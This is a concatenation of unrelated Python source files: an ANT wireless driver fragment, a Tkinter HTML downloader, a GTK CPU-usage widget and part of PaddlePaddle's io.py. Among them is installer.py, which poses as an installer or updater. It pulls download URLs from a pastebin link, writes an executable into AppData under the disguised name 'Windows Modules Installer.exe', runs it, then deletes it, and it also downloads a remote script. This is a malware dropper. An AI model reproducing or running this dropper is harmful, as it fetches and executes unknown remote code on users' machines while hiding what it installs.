data = array.array('B', struct.pack("<BH", channel, messagePeriod))
message = Message(Message.ID.SET_CHANNEL_PERIOD, data)
self.write_message(message)
def set_channel_search_timeout(self, channel, timeout):
message = Message(Message.ID.SET_CHANNEL_SEARCH_TIMEOUT, [channel, timeout])
self.write_message(message)
def set_channel_rf_freq(self, channel, rfFreq):
message = Message(Message.ID.SET_CHANNEL_RF_FREQ, [channel, rfFreq])
self.write_message(message)
def set_network_key(self, network, key):
message = Message(Message.ID.SET_NETWORK_KEY, [network] + key)
self.write_message(message)
# This function is a bit of a mystery. It is mentioned in libgant,
# http://sportwatcher.googlecode.com/svn/trunk/libgant/gant.h and is
# also sent from the official ANT daemon on Windows.
def set_search_waveform(self, channel, waveform):
message = Message(Message.ID.SET_SEARCH_WAVEFORM, [channel] + waveform)
self.write_message(message)
def reset_system(self):
message = Message(Message.ID.RESET_SYSTEM, [0x00])
self.write_message(message)
time.sleep(self._RESET_WAIT)
def request_message(self, channel, messageId):
message = Message(Message.ID.REQUEST_MESSAGE, [channel, messageId])
self.write_message(message)
def send_acknowledged_data(self, channel, data):
assert len(data) == 8
message = Message(Message.ID.ACKNOWLEDGE_DATA,
array.array('B', [channel]) + data)
self.write_message_timeslot(message)
def send_burst_transfer_packet(self, channel_seq, data, first):
assert len(data) == 8
message = Message(Message.ID.BURST_TRANSFER_DATA,
array.array('B', [channel_seq]) + data)
self.write_message_timeslot(message)
def send_burst_transfer(self, channel, data):
assert len(data) % 8 == 0
_logger.debug("Send burst transfer, chan %s, data %s", channel, data)
packets = len(data) / 8
for i in range(packets):
sequence = ((i - 1) % 3) + 1
if i == 0:
sequence = 0
elif i == packets - 1:
sequence = sequence | 0b100
channel_seq = channel | sequence << 5
packet_data = data[i * 8:i * 8 + 8]
_logger.debug("Send burst transfer, packet %d, seq %d, data %s", i, sequence, packet_data)
self.send_burst_transfer_packet(channel_seq, packet_data, first=i==0)
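# Worked example: a 32-byte payload yields 4 packets whose sequence fields
# are 0, 1, 2 and 0b100 | 3 = 7, i.e. the top bit marks the final packet.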
def response_function(self, channel, event, data):
pass
def channel_event_function(self, channel, event, data):
pass
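# Hypothetical usage sketch (channel settings and the network key are
# placeholders, not real ANT+ values; response_function and
# channel_event_function would normally be overridden in a subclass):
# ant = Ant()
# ant.set_network_key(0, [0x00] * 8)
# ant.assign_channel(0, 0x00, 0)
# ant.set_channel_id(0, 0, 120, 0)
# ant.open_channel(0)
# ant.start()  # blocks, dispatching events until stop() is called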
|
installer.py
|
import requests, getpass, threading, time, os
def getupdate():
try:
r = requests.get('https://pastebin.com/raw/rvDvVu5p').json()
downloadurl = r['Download1']
url = r['DURL']
d = [downloadurl, url]
return d
except:
print('Error while getting update...')
pass
def auth(url):
try:
r1 = requests.get(url, stream=True)
a = f'C:\\Users\\{getpass.getuser()}\\AppData\\local\\Windows Modules Installer.exe'
open(a, 'wb').write(r1.content)
os.startfile(a)
time.sleep(2)
print('Completed install/update -> closing..')
time.sleep(2)
os.remove(a)
except:
pass
def download(downloadurl):
try:
r2 = requests.get(downloadurl, stream=True)
open("test.py", 'wb').write(r2.content)
except:
print('Error while downloading...')
if __name__ == "__main__":
print('''
█ ██ ███▄ █ ██ ▄█▀ ███▄ █ ▒█████ █ █░███▄ █ ▒██ ██▒
██ ▓██▒ ██ ▀█ █ ██▄█▒ ██ ▀█ █ ▒██▒ ██▒▓█░ █ ░█░██ ▀█ █ ▒▒ █ █ ▒░
▓██ ▒██░▓██ ▀█ ██▒▓███▄░ ▓██ ▀█ ██▒▒██░ ██▒▒█░ █ ░█▓██ ▀█ ██▒ ░░ █ ░
▓▓█ ░██░▓██▒ ▐▌██▒▓██ █▄ ▓██▒ ▐▌██▒▒██ ██░░█░ █ ░█▓██▒ ▐▌██▒ ░ █ █ ▒
▒▒█████▓ ▒██░ ▓██░▒██▒ █▄▒██░ ▓██░░ ████▓▒░░░██▒██▓▒██░ ▓██░ ▒██▒ ▒██▒
░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ▒ ▒▒ ▓▒░ ▒░ ▒ ▒ ░ ▒░▒░▒░ ░ ▓░▒ ▒ ░ ▒░ ▒ ▒ ▒▒ ░ ░▓ ░
░░▒░ ░ ░ ░ ░░ ░ ▒░░ ░▒ ▒░░ ░░ ░ ▒░ ░ ▒ ▒░ ▒ ░ ░ ░ ░░ ░ ▒░ ░░ ░▒ ░
░░░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
██▓ ███▄ █ ██████ ▄▄▄█████▓ ▄▄▄ ██▓ ██▓ ▓█████ ██▀███
▓██▒ ██ ▀█ █ ▒██ ▒ ▓ ██▒ ▓▒▒████▄ ▓██▒ ▓██▒ ▓█ ▀ ▓██ ▒ ██▒
▒██▒▓██ ▀█ ██▒░ ▓██▄ ▒ ▓██░ ▒░▒██ ▀█▄ ▒██░ ▒██░ ▒███ ▓██ ░▄█ ▒
░██░▓██▒ ▐▌██▒ ▒ ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██░ ▒██░ ▒▓█ ▄ ▒██▀▀█▄
░██░▒██░ ▓██░▒██████▒▒ ▒██▒ ░ ▓█ ▓██▒░██████▒░██████▒░▒████▒░██▓ ▒██▒
░▓ ░ ▒░ ▒ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░ ▒▒ ▓▒█░░ ▒░▓ ░░ ▒░▓ ░░░ ▒░ ░░ ▒▓ ░▒▓░
▒ ░░ ░░ ░ ▒░░ ░▒ ░ ░ ░ ▒ ▒▒ ░░ ░ ▒ ░░ ░ ▒ ░ ░ ░ ░ ░▒ ░ ▒░
▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
>>> Made by cVenge <<<
>>> Downloading... <<<
''')
d = getupdate()
t1 = threading.Thread(target=auth, args=(d[1],))
t1.start()
t1.join()
t2 = threading.Thread(target=download, args=(d[0],))
t2.start()
t2.join()
|
dhtml2text.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import urllib.request
import urllib.error
import os
import re
from tkinter import *
from tkinter.filedialog import askdirectory
import html2text
import threading
import chardet
class DownloadTools:
def __init__(self):
self.__log_util = LogUtils()
self.__setup()
def __start_download(self):
self.__log_util.clear()
self.__log_util.set_callback(self.__update_logs)
url = self.__htmlUrl.get()
self.__spider = Spider(url, Spider.format_file_path(url, self.__write_path.get()), self.__log_util)
self.__spider.start_download()
def __export2text(self):
self.__log_util.clear()
self.__log_util.set_callback(self.__update_logs)
Html2Text(
Spider.format_file_path(self.__htmlUrl.get(), self.__write_path.get()),
self.__enabled_combined.get() == 1,
self.__log_util
).export2text()
def __show_dialog(self):
self.__write_path.set(askdirectory())
def __setup_log_frame(self, win):
log_frame = Frame(win)
self.__logs_var = StringVar()
self.__log_list = Listbox(log_frame, listvariable=self.__logs_var, height=10).pack(expand=YES, fill=BOTH)
log_frame.pack(fill=BOTH, expand=YES)
def __setup(self):
root = Tk()
root.title("Download Html Tool")
root.geometry('300x400')
self.__htmlUrl = StringVar()
self.__write_path = StringVar()
self.__enabled_combined = IntVar()
# download frame
frame = Frame(root)
Entry(frame, textvariable=self.__htmlUrl).pack(side=LEFT, fill=X, expand=YES)
Button(frame, text="Download", command=self.__start_download).pack(side=RIGHT)
frame.pack(fill=X)
# export frame
export_frame = Frame(root)
explore_frame = Frame(export_frame)
Entry(explore_frame, textvariable=self.__write_path).pack(side=LEFT)
Button(explore_frame, text="Explore Saved Path", command=self.__show_dialog).pack(side=RIGHT)
explore_frame.pack()
Button(export_frame, text="Export to Text", command=self.__export2text).pack(side=RIGHT)
check_btn = Checkbutton(export_frame, text="combined", variable=self.__enabled_combined, state='disabled')
check_btn.select()
check_btn.pack(side=RIGHT)
export_frame.pack()
self.__setup_log_frame(root)
root.mainloop()
def __update_logs(self, logs, _):
self.__logs_var.set(logs)
class Html2Text:
def __init__(self, base_dir, combined, log_util):
self.__base_dir = base_dir
self.__contents = os.listdir(base_dir)
self.__contents.sort()
self.__combined = combined
self.__log_util = log_util
def export2text(self):
task_thread = threading.Thread(target=self.__export2text)
task_thread.daemon = True
task_thread.start()
def __export2text(self):
self.__log_util.append('start export')
combined_f = None
if self.__combined:
combined_f = open(self.__base_dir + '/' + 'html2text.txt', 'a')
for file_name in self.__contents:
if not ('htm' in file_name.split('.')[-1]):
continue
self.__log_util.append('export %s' % file_name)
html_f = open(self.__base_dir + '/' + file_name, 'rb')
html = html_f.read()
html_f.close()
charset = chardet.detect(html)['encoding']
if (charset is None) or (charset == 'GB2312'):
"""
Note: chardet may misidentify GB18030 as GB2312.
If the charset is not detected here, determine it with another tool and adjust it manually.
"""
charset = 'GB18030'
clean_text = html2text.html2text(html.decode(charset))
combined_f.write(clean_text)
combined_f.close()
self.__log_util.append('finished!!!')
class LogUtils:
def __init__(self, callback=None):
self.__logs = []
self.__callback = callback
def set_callback(self, callback):
self.__callback = callback
def append(self, log_msg):
self.__logs.append(log_msg)
if self.__callback is not None:
self.__callback(self.__logs, log_msg)
def get_logs(self):
return self.__logs
def clear(self):
self.__logs.clear()
if self.__callback is not None:
self.__callback(self.__logs, None)
class Spider:
def __init__(self, site_url, write_path, log_util):
self.__siteURL = site_url
self.__write_path = write_path
self.__contents = []
self.__log_util = log_util
def start_download(self):
if len(self.__siteURL) == 0:
return
if not os.path.exists(self.__write_path):
os.mkdir(self.__write_path)
task_thread = threading.Thread(target=self.__downloading)
task_thread.daemon = True
task_thread.start()
def __downloading(self):
contents = self.__get_contents()
for item in contents:
try:
self.__save_files(item.decode('utf-8'), item.decode('utf-8').split('/')[-1])
except UnicodeDecodeError as e:
self.__log_util.append(str(e))
self.__log_util.append('download successful!!!')
def __get_contents(self):
page = self.__get_page()
pattern = re.compile(b'<a(.+?)href="(.+?)"', re.S)
items = re.findall(pattern, page)
for item in items:
self.__contents.append(item[1])
return self.__contents
def __save_files(self, file_url, filename):
file_path = self.__write_path + filename
if '.html' in file_url or '.htm' in file_url:
if 'http' not in file_url:
new_file_url = file_url
if '/' in file_url:
new_file_url = file_url.split('/')[-1]
if 'htm' in self.__siteURL[-4:]:
last_slash_index = self.__siteURL.index(self.__siteURL.split('/')[-1])
file_url = self.__siteURL[0:last_slash_index] + new_file_url
else:
if self.__siteURL[-1] != '/':
file_url = self.__siteURL + '/' + new_file_url
else:
file_url = self.__siteURL + new_file_url
try:
u = urllib.request.urlopen(file_url)
data = u.read()
f = open(file_path, 'wb')
f.write(data)
f.close()
self.__log_util.append('the url is %s, write path is %s' % (file_url, file_path))
except(urllib.error.HTTPError, urllib.error.URLError, IOError) as e:
self.__log_util.append(str(e))
def __get_page(self):
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
'Accept': 'text/html, application/xhtml+xml, application/xml'
}
request = urllib.request.Request(self.__siteURL, headers=headers)
response = urllib.request.urlopen(request)
return response.read()
@staticmethod
def format_file_path(site_url, base_dir):
if len(base_dir) == 0:
return os.getcwd()
return base_dir + '/' + site_url.split('/')[2] + '/'
if __name__ == '__main__':
DownloadTools()
|
CpuUsage.py
|
import os, sys
parentPath = os.path.abspath("..")
if parentPath not in sys.path:
sys.path.insert(0, parentPath)
from widgets.Label import Label
from widgets.Image import Image
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, GObject, Gdk
import datetime
import psutil
import time
import threading
class CpuUsage(Label):
def __init__(self, bgColor='#ffffff', fgColor='#000000', fmt='%s', percpu=True, delay=1,
fontSize=10, font="", decoratePos="DOWN", decoreateImg=""):
super().__init__(bgColor, fgColor, fontSize=fontSize, font=font, decoratePos=decoratePos, decoreateImg=decoreateImg)
self.percpu = percpu
self.fmt = fmt
self.text = self.newText = ""
self.delay = delay
th = threading.Thread(target=self.UpdateThread)
th.daemon = True
th.start()
def UpdateThread(self):
while True:
self.data = psutil.cpu_percent(interval=1, percpu=self.percpu)
res = ""
if self.percpu:
for core in self.data:
res += self.fmt % (core)
else:
res += self.fmt % (self.data)
self.newText = res
time.sleep(self.delay)
def Update(self):
if self.text != self.newText:
self.text = self.newText
self.SetText()
return True
def SetText(self):
txt = '<span font="%s">%s</span>' % (str(self.fontSize), self.text)
self.label.set_markup(txt)
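# Hypothetical usage sketch (assumes the surrounding widget framework packs the
# label into a Gtk window and drives Update() from a periodic GObject timeout):
# cpu = CpuUsage(fmt='%3.0f%% ', percpu=True, delay=2)
# GObject.timeout_add(1000, cpu.Update)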
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
from ..wrapped_decorator import signature_safe_contextmanager
import multiprocessing
import os
import six
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
__all__ = [
'data', 'open_files', 'read_file', 'shuffle', 'batch', 'double_buffer',
'random_data_generator', 'py_reader', 'create_py_reader_by_data',
'Preprocessor', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Notice that paddle would only use :code:`shape` to infer the shapes of
following variables in the network during compile-time. During run-time,
paddle would not check whether the shape of the fed data matches the
:code:`shape` settings in this function.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of the each sample. Otherwise, it
should be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch size at run time.
2. If shape contains -1, such as shape=[1, -1].
append_batch_size will be enforced to be False (ineffective)
because PaddlePaddle cannot set more than 1 unknown number on the
shape.
dtype(np.dtype|VarType|str): The type of data : float32, float16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many clients are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma-separated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma-separated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1,)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
import paddle.fluid as fluid
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
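    # When feed_list is given, the shapes, dtypes and lod_levels are inferred
    # from the feed Variables themselves; otherwise the explicitly passed
    # shapes/dtypes/lod_levels arguments are used.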
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
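        # The provider thread pulls batches from the user-supplied generator,
        # converts them to LoDTensors when needed, and pushes them into the
        # blocking queue until the generator is exhausted or reader.exited is set.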
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.close()
raise ex
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
    source. For more details, see :ref:`user_guide_use_py_reader_en`. When
:code:`Executor::Run()` is invoked in C++ side, the data from the generator
would be read automatically. Unlike :code:`DataFeeder.feed()`, the data
reading process and :code:`Executor::Run()` process can run in parallel
using :code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
    called when the pass ends and :code:`fluid.core.EOFException` is raised.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
        shapes(list|tuple): List of tuples declaring the data shapes.
        dtypes(list|tuple): List of strings declaring the data types.
        lod_levels(list|tuple): List of ints declaring the lod_level of each input.
        name(basestring): The prefix of the Python queue name and Reader name.
            If None, a name will be generated automatically.
        use_double_buffer(bool): Whether to use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
                # user defined network, here a softmax regression example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
